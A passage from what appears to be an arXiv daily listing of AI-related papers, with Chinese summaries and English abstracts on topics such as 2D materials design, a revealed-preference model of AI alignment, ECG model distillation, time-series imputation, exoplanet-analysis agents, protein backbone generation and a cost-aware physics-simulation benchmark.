Abstract:Artificial intelligence (AI) and machine learning (ML) models in materials science are predominantly trained on ideal bulk crystals, limiting their transferability to real-world applications where surfaces, interfaces, and defects dominate. We present Mat3ra-2D, an open-source framework for the rapid design of realistic two-dimensional materials and related structures, including slabs and heterogeneous interfaces, with support for disorder and defect-driven complexity. The approach combines: (1) well-defined standards for storing and exchanging materials data with a modular implementation of core concepts and (2) transformation workflows expressed as configuration-builder pipelines that preserve provenance and metadata. We implement typical structure generation tasks, such as constructing orientation-specific slabs or strain-matching interfaces, in reusable Jupyter notebooks that serve as both interactive documentation and templates for reproducible runs. To lower the barrier to adoption, we design the examples to run in any web browser and demonstrate how to incorporate these developments into a web application. Mat3ra-2D enables systematic creation and organization of realistic 2D- and interface-aware datasets for AI/ML-ready applications.
[AI-171] A Revealed Preference Framework for AI Alignment
【速读】:该论文试图解决的问题是:当人类决策者将选择权委托给人工智能(AI)代理时,AI是否真正执行人类委托人的偏好,还是追求自身的利益?为回答这一问题,作者提出了一种名为“Luce对齐模型”(Luce Alignment Model)的理论框架,其中AI的选择是由两个Luce规则(Luce choice rule)的混合构成——一个反映人类偏好,另一个反映AI自身偏好。该模型的关键创新在于,通过揭示偏好(revealed preference)方法,在两种场景下均可识别AI与人类偏好的对齐程度:一是实验室场景中同时观察人类和AI的选择;二是田野场景中仅观察AI的选择。这使得对AI行为动机的可识别性成为可能,从而为评估AI代理的可信度和可控性提供了实证基础。
链接: https://arxiv.org/abs/2603.27868
作者: Elchin Suleymanov
机构: 未知
类目: Theoretical Economics (econ.TH); Artificial Intelligence (cs.AI); Computer Science and Game Theory (cs.GT)
备注:
Abstract:Human decision makers increasingly delegate choices to AI agents, raising a natural question: does the AI implement the human principal’s preferences or pursue its own? To study this question using revealed preference techniques, I introduce the Luce Alignment Model, where the AI’s choices are a mixture of two Luce rules, one reflecting the human’s preferences and the other the AI’s. I show that the AI’s alignment (similarity of human and AI preferences) can be generically identified in two settings: the laboratory setting, where both human and AI choices are observed, and the field setting, where only AI choices are observed.
[AI-172] Suppression of 14mathrmC photon hits in large liquid scintillator detectors via spatiotemporal deep learning
【速读】:该论文旨在解决液态闪烁体(Liquid Scintillator, LS)探测器中碳-14(14C)β衰变产生的光子对正电子(e+)信号能量分辨率的干扰问题。由于14C在LS中丰度极低,其衰变产生的光子常与e+事件在空间和时间上高度重叠,导致能量分辨劣化。解决方案的关键在于提出三种基于图神经网络和Transformer架构的模型,用于在e+事件中识别并标记由14C引起的光子击中(hit),从而在击中层面抑制14C污染的影响。这些模型通过引入时空特征、标量与向量电荷编码机制,在保持e+误判率低于1%的前提下,实现了25%-48%的14C召回率,显著提升了高重叠事件下的总电荷能量分辨率。
链接: https://arxiv.org/abs/2603.27727
作者: Junle Li,Zhaoxiang Wu,Guanda Gong,Zhaohan Li,Wuming Luo,Jiahui Wei,Wenxing Fang,Hehe Fan
机构: 未知
类目: Instrumentation and Detectors (physics.ins-det); Artificial Intelligence (cs.AI); High Energy Physics - Experiment (hep-ex)
备注: 14 pages, 11 figures
Abstract:Liquid scintillator detectors are widely used in neutrino experiments due to their low energy threshold and high energy resolution. Despite the tiny abundance of ^14 C in LS, the photons induced by the \beta decay of the ^14 C isotope inevitably contaminate the signal, degrading the energy resolution. In this work, we propose three models to tag ^14 C photon hits in e^+ events with ^14 C pile-up, thereby suppressing its impact on the energy resolution at the hit level: a gated spatiotemporal graph neural network and two Transformer-based models with scalar and vector charge encoding. For a simulation dataset in which each event contains one ^14 C and one e^+ with kinetic energy below 5 MeV, the models achieve ^14 C recall rates of 25%-48% while maintaining e^+ to ^14 C misidentification below 1%, leading to a large improvement in the resolution of total charge for events where e^+ and ^14 C photon hits strongly overlap in space and time.
[AI-173] Multiple-Prediction-Powered Inference ICLR2026
【速读】:该论文旨在解决统计估计中如何在高成本高质量测量与多种低成本低质量代理指标之间进行最优资源配置的问题。其核心挑战在于如何利用不同数据源的复杂成本结构和相关性,以最小化估计误差并提升统计效率。解决方案的关键在于提出多预测驱动推断(Multiple-Prediction-Powered Inference, MultiPPI)框架,该框架通过学习各数据源的成本-相关性结构,实现预算自适应的资源分配策略,从而在有限预算下最优组合多个模型预测,显著降低估计误差,并提供最小极大最优性、有限样本性能和渐近正态性的理论保障。
链接: https://arxiv.org/abs/2603.27414
作者: Charlie Cowen-Breen,Alekh Agarwal,Stephen Bates,William W. Cohen,Jacob Eisenstein,Amir Globerson,Adam Fisch
机构: 未知
类目: atistics Theory (math.ST); Artificial Intelligence (cs.AI)
备注: ICLR 2026, 45 pages, 17 figures
Abstract:Statistical estimation often involves tradeoffs between expensive, high-quality measurements and a variety of lower-quality proxies. We introduce Multiple-Prediction-Powered Inference (MultiPPI): a general framework for constructing statistically efficient estimates by optimally allocating resources across these diverse data sources. This work provides theoretical guarantees about the minimax optimality, finite-sample performance, and asymptotic normality of the MultiPPI estimator. Through experiments across three diverse large language model (LLM) evaluation scenarios, we show that MultiPPI consistently achieves lower estimation error than existing baselines. This advantage stems from its budget-adaptive allocation strategy, which strategically combines subsets of models by learning their complex cost and correlation structures.
[AI-174] From Foundation ECG Models to NISQ Learners: Distilling ECGFounder into a VQC Student
【速读】:该论文旨在解决基础模型(Foundation Models)在心电图(ECG)分类任务中因计算成本高和延迟限制而难以部署的问题。其解决方案的关键在于利用知识蒸馏(Knowledge Distillation)技术,将高性能但参数量大的教师模型(ECGFounder)的预测行为迁移至轻量级的学生模型,包括两类经典1D神经网络(ResNet-1D 和轻量级CNN-1D)以及一个量子就绪的混合架构——该架构由卷积自编码器压缩ECG信号至低维潜在表示,并结合6量子比特变分量子电路(Variational Quantum Circuit)实现高效推理。实验表明,在PTB-XL和MIT-BIH Arrhythmia Database上,蒸馏后学生模型在显著减少可训练参数的同时仍保持竞争性性能,且不同蒸馏设置下的准确率与效率之间存在一致权衡关系。
链接: https://arxiv.org/abs/2603.27269
作者: Giovanni dos Santos Franco,Felipe Mahlow,Ellison Fernando Cardoso,Felipe Fanchini
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注:
Abstract:Foundation models have recently improved electrocardiogram (ECG) representation learning, but their deployment can be limited by computational cost and latency constraints. In this work, we fine-tune ECGFounder as a high-capacity teacher for binary ECG classification on PTB-XL and the MIT-BIH Arrhythmia Database, and investigate whether knowledge distillation can transfer its predictive behavior to compact students. We evaluate two classical 1D students (ResNet-1D and a lightweight CNN-1D) and a quantum-ready pipeline that combines a convolutional autoencoder, which compresses 256-sample ECG windows into a low-dimensional latent representation, with a 6-qubit variational quantum circuit implemented in Qiskit and executed in a simulated backend. Across both datasets, the teacher provides the strongest overall performance, while distillation yields competitive students under a considerable reduction in trainable parameters. We further analyze the sensitivity of student performance to distillation settings, highlighting consistent accuracy–efficiency trade-offs when compressing a foundation ECG model into classical and quantum-ready learners under a unified evaluation protocol.
[AI-175] Bayes-MICE: A Bayesian Approach to Multiple Imputation for Time Series Data
【速读】:该论文旨在解决时间序列数据中缺失值 imputation(插补)的问题,尤其关注传统多重插补方法(如 MICE)在处理时序依赖性时未能充分量化参数与插补值不确定性的问题。其解决方案的关键在于将 MICE 方法扩展为基于贝叶斯框架的 Bayes-MICE,利用马尔可夫链蒙特卡洛(Markov Chain Monte Carlo, MCMC)采样来显式建模模型参数和插补值的不确定性,并引入时序启发式初始化和滞后特征以保留时间序列的顺序特性。实验表明,Bayes-MICE 在 AirQuality 和 PhysioNet 两个真实数据集上均优于基准方法,且 Metropolis-Adjusted Langevin Algorithm(MALA)相比 Random Walk Metropolis(RWM)具有更快收敛速度和更稳定的后验探索能力,从而在提升插补精度的同时提供可靠的不确定性估计。
链接: https://arxiv.org/abs/2603.27142
作者: Amuche Ibenegbu,Pierre Lafaye de Micheaux,Rohitash Chandra
机构: 未知
类目: Machine Learning (stat.ML); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Time-series analysis is often affected by missing data, a common problem across several fields, including healthcare and environmental monitoring. Multiple Imputation by Chained Equations (MICE) has been prominent for imputing missing values through “fully conditional specification”. We extend MICE using the Bayesian framework (Bayes-MICE), utilising Bayesian inference to impute missing values via Markov Chain Monte Carlo (MCMC) sampling to account for uncertainty in MICE model parameters and imputed values. We also include temporally informed initialisation and time-lagged features in the model to respect the sequential nature of time-series data. We evaluate the Bayes-MICE method using two real-world datasets (AirQuality and PhysioNet), and using both the Random Walk Metropolis (RWM) and the Metropolis-Adjusted Langevin Algorithm (MALA) samplers. Our results demonstrate that Bayes-MICE reduces imputation errors relative to the baseline methods over all variables and accounts for uncertainty in the imputation process, thereby providing a more accurate measure of imputation error. We also found that MALA converges faster than RWM, achieving comparable accuracy while providing more consistent posterior exploration. Overall, these findings suggest that the Bayes-MICE framework represents a practical and efficient approach to time-series imputation, balancing increased accuracy with meaningful quantification of uncertainty in various environmental and clinical settings. Subjects: Machine Learning (stat.ML); Artificial Intelligence (cs.AI); Machine Learning (cs.LG) Cite as: arXiv:2603.27142 [stat.ML] (or arXiv:2603.27142v1 [stat.ML] for this version) https://doi.org/10.48550/arXiv.2603.27142 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-176] Online Statistical Inference of Constant Sample-averag ed Q-Learning
【速读】:该论文旨在解决强化学习算法在高方差和不稳定性环境下(如存在噪声或稀疏奖励的环境)性能下降的问题。其解决方案的关键在于提出一种用于样本平均Q-learning方法的统计在线推断框架,通过在一般条件下适配泛函中心极限定理(Functional Central Limit Theorem, FCLT),并利用随机缩放构建Q值的置信区间,从而实现对学习过程的稳健统计推断。实验在网格世界和动态资源匹配两个问题上验证了该方法的有效性,相较于传统Q-learning,该框架能提供更可靠的置信区间估计。
链接: https://arxiv.org/abs/2603.26982
作者: Saunak Kumar Panda,Tong Li,Ruiqi Liu,Yisha Xiang
机构: 未知
类目: Machine Learning (stat.ML); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 7 pages, 2 figures, 2 tables, Reinforcement Learning Safety Workshop (RLSW), Reinforcement Learning Conference (RLC) 2024
Abstract:Reinforcement learning algorithms have been widely used for decision-making tasks in various domains. However, the performance of these algorithms can be impacted by high variance and instability, particularly in environments with noise or sparse rewards. In this paper, we propose a framework to perform statistical online inference for a sample-averaged Q-learning approach. We adapt the functional central limit theorem (FCLT) for the modified algorithm under some general conditions and then construct confidence intervals for the Q-values via random scaling. We conduct experiments to perform inference on both the modified approach and its traditional counterpart, Q-learning using random scaling and report their coverage rates and confidence interval widths on two problems: a grid world problem as a simple toy example and a dynamic resource-matching problem as a real-world example for comparison between the two solution approaches.
[AI-177] ASTER – Agent ic Science Toolkit for Exoplanet Research
【速读】:该论文旨在解决当前系外行星大气研究中多步骤分析流程复杂、工具分散且对用户专业技能要求高的问题,尤其在透射光谱分析任务中,涉及档案查询、文献检索、辐射传输模型调用及贝叶斯反演等环节,需跨领域知识整合。解决方案的关键在于提出ASTERS(Agentic Science Toolkit for Exoplanet Research),一个基于大语言模型(Large Language Model, LLM)的代理式科学工具包,通过集成领域特定工具(如NASA系外行星档案数据下载、TauREx辐射传输与贝叶斯反演模块)、工作流规划与管理能力,以及具备迭代推理和建议优化方案的智能代理机制,实现自动化、可解释的全流程分析支持。
链接: https://arxiv.org/abs/2603.26953
作者: Emilie Panek,Alexander Roman,Gaurav Shukla,Leonardo Pagliaro,Katia Matcheva,Konstantin Matchev
机构: 未知
类目: Earth and Planetary Astrophysics (astro-ph.EP); Instrumentation and Methods for Astrophysics (astro-ph.IM); Artificial Intelligence (cs.AI); Emerging Technologies (cs.ET); Machine Learning (cs.LG)
备注: 17 pages, 10 figures
Abstract:The expansion of exoplanet observations has created a need for flexible, accessible, and user-friendly workflows. Transmission spectroscopy has become a key technique for probing atmospheric composition of transiting exoplanets. The analyses of these data require the combination of archival queries, literature search, the use of radiative transfer models, and Bayesian retrieval frameworks, each demanding specialized expertise. Modern large language models enable the coordinated execution of complex, multi-step tasks by AI agents with tool integration, structured prompts, and iterative reasoning. In this study we present ASTER, an Agentic Science Toolkit for Exoplanet Research. ASTER is an orchestration framework that brings LLM capability to the exoplanetary community by enabling LLM-driven interaction with integrated domain-specific tools, workflow planning and management, and support for common data analysis tasks. Currently ASTER incorporates tools for downloading planetary parameters and observational datasets from the NASA Exoplanet Archive, as well as the generation of transit spectra from the TauREx radiative transfer model, and the completion of Bayesian retrieval of planetary parameters with TauREx. Beyond tool integration, the agent assists users by proposing alternative modeling approaches, reporting potential issues and suggesting solutions, and interpretations. We demonstrate ASTER’s workflow through a complete case study of WASP-39b, performing multiple retrievals using observational data available on the archive. The agent efficiently transitions between datasets, generates appropriate forward model spectra and performs retrievals. ASTER provides a unified platform for the characterization of exoplanet atmospheres. Ongoing development and community contributions will continue expanding ASTER’s capabilities toward broader applications in exoplanet research.
[AI-178] Are LLM s Good For Quantum Software Architecture and System Design?
【速读】:该论文旨在解决当前量子计算系统在软件、架构与系统层面的成熟度不足问题,这一瓶颈阻碍了量子计算机从理论研究走向实际应用(即“实用化”阶段)。其关键解决方案是探索大型语言模型(Large Language Models, LLMs)在量子系统推理任务中的潜力,通过案例研究评估九个前沿LLM在量子计算相关问题上的表现,并将其与德克萨斯大学奥斯汀分校研究生的表现进行对比,从而验证LLM是否能够辅助解决量子软件、硬件架构及系统设计中的复杂问题。
链接: https://arxiv.org/abs/2603.26904
作者: Sourish Wawdhane,Poulami Das
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注: 2 pages
Abstract:Quantum computers promise massive computational speedup for problems in many critical domains, such as physics, chemistry, cryptanalysis, healthcare, etc. However, despite decades of research, they remain far from entering an era of utility. The lack of mature software, architecture, and systems solutions capable of translating quantum-mechanical properties of algorithms into physical state transformations on qubit devices remains a key factor underlying the slow pace of technological progress. The problem worsens due to significant reliance on domain-specific expertise, especially for software developers, computer architects, and systems engineers. To address these limitations and accelerate large-scale high-performance quantum system design, we ask: Can large language models (LLMs) help with solving quantum software, architecture, and systems problems? In this work, we present a case study assessing the performance of LLMs on quantum system reasoning tasks. We evaluate nine frontier LLMs and compare their performance to graduate UT Austin students on a set of quantum computing problems. Finally, we recommend several directions along which research and engineering development efforts must be pursued. Comments: 2 pages Subjects: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI) Cite as: arXiv:2603.26904 [quant-ph] (or arXiv:2603.26904v1 [quant-ph] for this version) https://doi.org/10.48550/arXiv.2603.26904 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-179] Dual-branch Graph Domain Adaptation for Cross-scenario Multi-modal Emotion Recognition
【速读】:该论文旨在解决多模态情感识别(Multimodal Emotion Recognition in Conversations, MERC)在跨场景条件下的域偏移(domain shift)与标签噪声问题。现有方法通常忽略真实场景中说话人、话题、风格及噪声水平的差异,导致模型在源域训练后难以泛化到未见的目标域。其解决方案的关键在于提出双分支图域自适应框架(Dual-branch Graph Domain Adaptation, DGDA):首先构建情绪交互图以刻画话语间的复杂情感依赖关系;进而设计由超图神经网络(Hypergraph Neural Network, HGNN)和路径神经网络(Path Neural Network, PathNN)组成的双分支编码器,显式建模多变量关系并隐式捕捉全局依赖;此外引入域对抗判别器学习跨域不变表示,并结合正则化损失抑制噪声标签的影响,从而实现对跨场景对话的情感识别鲁棒性提升。
链接: https://arxiv.org/abs/2603.26840
作者: Yuntao Shou,Jun Zhou,Tao Meng,Wei Ai,Keqin Li
机构: 未知
类目: Audio and Speech Processing (eess.AS); Artificial Intelligence (cs.AI)
备注: 29 pages
Abstract:Multimodal Emotion Recognition in Conversations (MERC) aims to predict speakers’ emotional states in multi-turn dialogues through text, audio, and visual cues. In real-world settings, conversation scenarios differ significantly in speakers, topics, styles, and noise levels. Existing MERC methods generally neglect these cross-scenario variations, limiting their ability to transfer models trained on a source domain to unseen target domains. To address this issue, we propose a Dual-branch Graph Domain Adaptation framework (DGDA) for multimodal emotion recognition under cross-scenario conditions. We first construct an emotion interaction graph to characterize complex emotional dependencies among utterances. A dual-branch encoder, consisting of a hypergraph neural network (HGNN) and a path neural network (PathNN), is then designed to explicitly model multivariate relationships and implicitly capture global dependencies. To enable out-of-domain generalization, a domain adversarial discriminator is introduced to learn invariant representations across domains. Furthermore, a regularization loss is incorporated to suppress the negative influence of noisy labels. To the best of our knowledge, DGDA is the first MERC framework that jointly addresses domain shift and label noise. Theoretical analysis provides tighter generalization bounds, and extensive experiments on IEMOCAP and MELD demonstrate that DGDA consistently outperforms strong baselines and better adapts to cross-scenario conversations. Our code is available at this https URL.
[AI-180] HASS: Hierarchical Simulation of Logopenic Aphasic Speech for Scalable PPA Detection
【速读】:该论文旨在解决原发性进行性失语症(Primary Progressive Aphasia, PPA)诊断模型构建中因数据稀缺带来的挑战,尤其是临床数据采集受限于患者群体的高度脆弱性和专家标注的高成本。现有方法通过模拟言语障碍生成训练数据,但仅聚焦于孤立的言语不流畅现象,未能全面模拟PPA作为多层级、整体性表型的复杂特征。其解决方案的关键在于提出一种基于临床依据的分层模拟框架——分层失语症语音模拟(Hierarchical Aphasic Speech Simulation, HASS),该框架系统识别并模拟lvPPA(语言迟缓变异型)在语义、音位和时间维度上的缺陷,从而实现更准确且泛化能力更强的检测模型。
链接: https://arxiv.org/abs/2603.26795
作者: Harrison Li,Kevin Wang,Cheol Jun Cho,Jiachen Lian,Rabab Rangwala,Chenxu Guo,Emma Yang,Lynn Kurteff,Zoe Ezzes,Willa Keegan-Rodewald,Jet Vonk,Siddarth Ramkrishnan,Giada Antonicelli,Zachary Miller,Marilu Gorno Tempini,Gopala Anumanchipalli
机构: 未知
类目: Audio and Speech Processing (eess.AS); Artificial Intelligence (cs.AI); Sound (cs.SD)
备注:
Abstract:Building a diagnosis model for primary progressive aphasia (PPA) has been challenging due to the data scarcity. Collecting clinical data at scale is limited by the high vulnerability of clinical population and the high cost of expert labeling. To circumvent this, previous studies simulate dysfluent speech to generate training data. However, those approaches are not comprehensive enough to simulate PPA as holistic, multi-level phenotypes, instead relying on isolated dysfluencies. To address this, we propose a novel, clinically grounded simulation framework, Hierarchical Aphasic Speech Simulation (HASS). HASS aims to simulate behaviors of logopenic variant of PPA (lvPPA) with varying degrees of severity. To this end, semantic, phonological, and temporal deficits of lvPPA are systematically identified by clinical experts, and simulated. We demonstrate that our framework enables more accurate and generalizable detection models.
[AI-181] Quantum Fuzzy Sets Revisited: Density Matrices Decoherence and the Q-Matrix Framework
【速读】:该论文旨在解决传统模糊集理论在量子计算框架下表达能力不足的问题,特别是纯态量子语义无法刻画语义退相干(semantic decoherence)现象的局限性。其解决方案的关键在于两个核心扩展:一是将量子模糊集从纯态推广到密度矩阵(density matrices),使真值域从Bloch球面扩展至整个Bloch球体,从而能够描述混合状态下的模糊隶属关系;二是引入Q-Matrix——一个全局密度矩阵,从中通过部分迹(partial trace)可提取出局部的量子模糊集,构建了量子模糊集范畴QFS,并揭示其在经典极限下表现为同时对角化特性,同时指出完全内蕴Frobenius代数处理存在障碍。
链接: https://arxiv.org/abs/2603.26739
作者: Mirco A. Mannucci
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注: 11 pages
Abstract:In 2006 we proposed Quantum Fuzzy Sets, observing that states of a quantum register could serve as characteristic functions of fuzzy subsets, embedding Zadeh’s unit interval into the Bloch sphere. That paper was deliberately preliminary. In the two decades since, the idea has been taken up by researchers working on quantum annealers, intuitionistic fuzzy connectives, and quantum machine learning, while parallel developments in categorical quantum mechanics have reshaped the theoretical landscape. The present paper revisits that programme and introduces two main extensions. First, we move from pure states to density matrices, so that truth values occupy the entire Bloch ball rather than its surface; this captures the phenomenon of semantic decoherence that pure-state semantics cannot express. Second, we introduce the Q-Matrix, a global density matrix from which individual quantum fuzzy sets emerge as local sections via partial trace. We define a category QFS of quantum fuzzy sets, establish basic structural properties (monoidal structure, fibration over Set), characterize the classical limit as simultaneous diagonalizability, and exhibit an obstruction to a fully internal Frobenius-algebra treatment.
[AI-182] PI-Mamba: Linear-Time Protein Backbone Generation via Spectrally Initialized Flow Matching
【速读】:该论文旨在解决蛋白质主链生成模型在几何有效性、采样效率和长序列可扩展性之间难以兼顾的问题。现有方法通常依赖迭代精炼、二次注意力机制或事后几何校正,导致计算效率与结构保真度之间存在权衡。其解决方案的关键在于提出Physics-Informed Mamba (PI-Mamba),通过构建时强制满足局部共价几何约束(covalent geometry),并结合流匹配(flow-matching)框架与Mamba状态空间架构,实现线性时间推理;同时引入基于Rouse聚合物模型的频谱初始化策略和辅助顺式脯氨酸感知头,显著提升优化稳定性和主链真实性,在基准任务中达到0%局部几何违规和高设计性(scTM = 0.91 ± 0.03),且可在单张A5000 GPU上处理超过2000个残基的蛋白质。
链接: https://arxiv.org/abs/2603.26705
作者: Tianyu Wu,Lin Zhu
机构: 未知
类目: Biomolecules (q-bio.BM); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Motivation: Generative models for protein backbone design have to simultaneously ensure geometric validity, sampling efficiency, and scalability to long sequences. However, most existing approaches rely on iterative refinement, quadratic attention mechanisms, or post-hoc geometry correction, leading to a persistent trade-off between computational efficiency and structural fidelity. Results: We present Physics-Informed Mamba (PI-Mamba), a generative model that enforces exact local covalent geometry by construction while enabling linear-time inference. PI-Mamba integrates a differentiable constraint-enforcement operator into a flow-matching framework and couples it with a Mamba-based state-space architecture. To improve optimisation stability and backbone realism, we introduce a spectral initialization derived from the Rouse polymer model and an auxiliary cis-proline awareness head. Across benchmark tasks, PI-Mamba achieves 0.0% local geometry violations and high designability (scTM = 0.91\pm 0.03 , n = 100), while scaling to proteins exceeding 2,000 residues on a single A5000 GPU (24 GB). Subjects: Biomolecules (q-bio.BM); Artificial Intelligence (cs.AI); Machine Learning (cs.LG) Cite as: arXiv:2603.26705 [q-bio.BM] (or arXiv:2603.26705v1 [q-bio.BM] for this version) https://doi.org/10.48550/arXiv.2603.26705 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-183] Complementarity-Preserving Generative Theory for Multimodal ECG Synthesis: A Quantum-Inspired Approach
【速读】:该论文旨在解决现有生成模型在合成多模态心电图(ECG)数据时存在的生理一致性不足问题,即虽然生成的ECG在视觉上合理,但在不同域(如时域、频域和时频域)之间缺乏生理上的互补性。其解决方案的关键在于提出一种互补性保持生成理论(Complementarity-Preserving Generative Theory, CPGT),强调生成过程必须显式保留跨域互补关系,而非简单地独立合成各模态;具体实现上采用量子启发的生成对抗网络Q-CFD-GAN,通过在复数潜在空间中建模多模态结构并引入约束机制以调控互信息、冗余度和形态一致性,从而显著提升合成数据的生理合理性与临床适用性。
链接: https://arxiv.org/abs/2603.26695
作者: Timothy Oladunni,Farouk Ganiyu-Adewumi,Clyde Baidoo,Kyndal Maclin
机构: 未知
类目: ignal Processing (eess.SP); Artificial Intelligence (cs.AI); Machine Learning (cs.LG); Image and Video Processing (eess.IV); Quantum Physics (quant-ph)
备注:
Abstract:Multimodal deep learning has substantially improved electrocardiogram (ECG) classification by jointly leveraging time, frequency, and time-frequency representations. However, existing generative models typically synthesize these modalities independently, resulting in synthetic ECG data that are visually plausible yet physiologically inconsistent across domains. This work establishes a Complementarity-Preserving Generative Theory (CPGT), which posits that physiologically valid multimodal signal generation requires explicit preservation of cross-domain complementarity rather than loosely coupled modality synthesis. We instantiate CPGT through Q-CFD-GAN, a quantum-inspired generative framework that models multimodal ECG structure within a complex-valued latent space and enforces complementarity-aware constraints regulating mutual information, redundancy, and morphological coherence. Experimental evaluation demonstrates that Q-CFD-GAN reduces latent embedding variance by 82%, decreases classifier-based plausibility error by 26.6%, and restores tri-domain complementarity from 0.56 to 0.91, while achieving the lowest observed morphology deviation (3.8%). These findings show that preserving multimodal information geometry, rather than optimizing modality-specific fidelity alone, is essential for generating synthetic ECG signals that remain physiologically meaningful and suitable for downstream clinical machine-learning applications.
[AI-184] Degrees Levels and Profiles of Contextuality
【速读】:该论文旨在解决传统方法中仅以单一数值表征系统整体上下文性(contextuality)的局限性问题,即无法揭示不同层次(level)下系统上下文性的动态变化特征。其解决方案的关键在于提出“上下文性轮廓”(contextuality profile)这一新概念,通过构建一个曲线关系来描述系统在不同变量组合层次(从1到N)下的上下文性程度,其中每个层次n对应于仅考虑最多n个变量的联合分布。该方法可与任意成熟的上下文性度量工具结合使用,并借助串联系统(concatenated systems)的构造策略实现对多种主流上下文性度量的系统性分析,从而提供更精细、层次化的上下文性刻画方式。
链接: https://arxiv.org/abs/2603.26692
作者: Ehtibar N. Dzhafarov,Victor H. Cervantes
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI); Probability (math.PR)
备注: 27 pp. 15 figures, 8 tables
Abstract:We introduce a new notion, that of a contextuality profile of a system. Rather than characterizing a system’s contextuality by a single number, its overall degree of contextuality, we show how it can be characterized by a curve relating degree of contextuality to level at which the system is considered,\beginarrayc|c|c|c|c|c|c|c \textnormallevel 1 \cdots n-1 n1 n+1 \cdots N\ \hline \textnormaldegree 0 \cdots 0 d_n0 d_n+1\geq d_n \cdots d_N\geq d_N-1 \endarray,where N is the maximum number of variables per system’s context. A system is represented at level n if one only considers the joint distributions with k\leq n variables, ignoring higher-order joint distributions. We show that the level-wise contextuality analysis can be used in conjunction with any well-constructed measure of contextuality. We present a method of concatenated systems to explore contextuality profiles systematically, and we apply it to the contextuality profiles for three major measures of contextuality proposed in the literature.
[AI-185] Lingshu-Cell: A generative cellular world model for transcriptome modeling toward virtual cells
【速读】:该论文旨在解决单细胞转录组学中细胞状态建模与扰动响应预测这一核心挑战,现有基础模型虽能提供强大的静态表征,但缺乏对细胞状态分布的显式建模能力,难以支持生成式模拟。其解决方案的关键在于提出Lingshu-Cell——一种掩码离散扩散模型(masked discrete diffusion model),该模型直接在与单细胞转录组数据稀疏性和非序列性兼容的离散token空间中操作,无需依赖基因筛选(如高变基因过滤或表达水平排序),即可捕获约18,000个基因范围内的全转录组表达依赖关系。通过联合嵌入细胞类型或供体身份与扰动信息,Lingshu-Cell能够实现对新组合的身份-扰动条件下的全转录组表达变化预测,在虚拟细胞挑战H1遗传扰动基准和人外周血单核细胞(PBMCs)细胞因子诱导响应预测任务中均达到领先性能,从而构建了一个灵活的细胞世界模型,为计算生物学中的扰动筛选与生物发现提供新范式。
链接: https://arxiv.org/abs/2603.25240
作者: Han Zhang,Guo-Hua Yuan,Chaohao Yuan,Tingyang Xu,Tian Bian,Hong Cheng,Wenbing Huang,Deli Zhao,Yu Rong
机构: 未知
类目: Quantitative Methods (q-bio.QM); Artificial Intelligence (cs.AI); Genomics (q-bio.GN)
备注:
Abstract:Modeling cellular states and predicting their responses to perturbations are central challenges in computational biology and the development of virtual cells. Existing foundation models for single-cell transcriptomics provide powerful static representations, but they do not explicitly model the distribution of cellular states for generative simulation. Here, we introduce Lingshu-Cell, a masked discrete diffusion model that learns transcriptomic state distributions and supports conditional simulation under perturbation. By operating directly in a discrete token space that is compatible with the sparse, non-sequential nature of single-cell transcriptomic data, Lingshu-Cell captures complex transcriptome-wide expression dependencies across approximately 18,000 genes without relying on prior gene selection, such as filtering by high variability or ranking by expression level. Across diverse tissues and species, Lingshu-Cell accurately reproduces transcriptomic distributions, marker-gene expression patterns and cell-subtype proportions, demonstrating its ability to capture complex cellular heterogeneity. Moreover, by jointly embedding cell type or donor identity with perturbation, Lingshu-Cell can predict whole-transcriptome expression changes for novel combinations of identity and perturbation. It achieves leading performance on the Virtual Cell Challenge H1 genetic perturbation benchmark and in predicting cytokine-induced responses in human PBMCs. Together, these results establish Lingshu-Cell as a flexible cellular world model for in silico simulation of cell states and perturbation responses, laying the foundation for a new paradigm in biological discovery and perturbation screening.
[AI-186] SimulCost: A Cost-Aware Benchmark and Toolkit for Automating Physics Simulations with LLM s
【速读】:该论文旨在解决当前大语言模型(Large Language Models, LLMs)在科学任务评估中忽视工具使用成本(如仿真时间与实验资源)的问题,导致传统指标(如pass@k)在现实预算约束下失效。其核心解决方案是提出SimulCost——首个面向物理仿真中参数调优的成本敏感型基准,通过量化LLM代理在单轮(初始猜测)和多轮(试错调整)模式下的准确率与计算成本,系统比较LLM方法与传统扫描策略的性能表现。关键创新在于构建了一个平台无关、解析定义的仿真成本模型,并涵盖12个来自流体动力学、固体力学和等离子体物理领域的模拟器,共4816个任务,揭示了LLM在高精度要求下初始猜测不可靠、多轮优化虽提升成功率但效率低于传统方法的局限性,从而为开发更经济的智能代理设计提供实证依据与可扩展工具链。
链接: https://arxiv.org/abs/2603.20253
作者: Yadi Cao,Sicheng Lai,Jiahe Huang,Yang Zhang,Zach Lawrence,Rohan Bhakta,Izzy F. Thomas,Mingyun Cao,Chung-Hao Tsai,Zihao Zhou,Yidong Zhao,Hao Liu,Alessandro Marinoni,Alexey Arefiev,Rose Yu
机构: 未知
类目: Computational Physics (physics.comp-ph); Artificial Intelligence (cs.AI); Distributed, Parallel, and Cluster Computing (cs.DC); Machine Learning (cs.LG)
备注:
Abstract:Evaluating LLM agents for scientific tasks has focused on token costs while ignoring tool-use costs like simulation time and experimental resources. As a result, metrics like pass@k become impractical under realistic budget constraints. To address this gap, we introduce SimulCost, the first benchmark targeting cost-sensitive parameter tuning in physics simulations. SimulCost compares LLM tuning cost-sensitive parameters against traditional scanning approach in both accuracy and computational cost, spanning 2,916 single-round (initial guess) and 1,900 multi-round (adjustment by trial-and-error) tasks across 12 simulators from fluid dynamics, solid mechanics, and plasma physics. Each simulator’s cost is analytically defined and platform-independent. Frontier LLMs achieve 46–64% success rates in single-round mode, dropping to 35–54% under high accuracy requirements, rendering their initial guesses unreliable especially for high accuracy tasks. Multi-round mode improves rates to 71–80%, but LLMs are 1.5–2.5x slower than traditional scanning, making them uneconomical choices. We also investigate parameter group correlations for knowledge transfer potential, and the impact of in-context examples and reasoning effort, providing practical implications for deployment and fine-tuning. We open-source 